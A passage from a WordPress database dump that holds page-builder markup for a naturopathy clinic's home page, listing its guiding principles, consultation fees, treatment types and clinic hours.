header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01-large.png\" title_text=\"2-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">Choose from face-to-face or Zoom consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-26 21:12:12','2021-05-26 13:12:12','',28,'https://verdenaturopathy.com.au/?p=202',0,'revision','',0),(191,1,'2021-05-26 20:12:17','2021-05-26 12:12:17','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01-large.png\" title_text=\"2-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">Choose from face-to-face or Zoom consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" 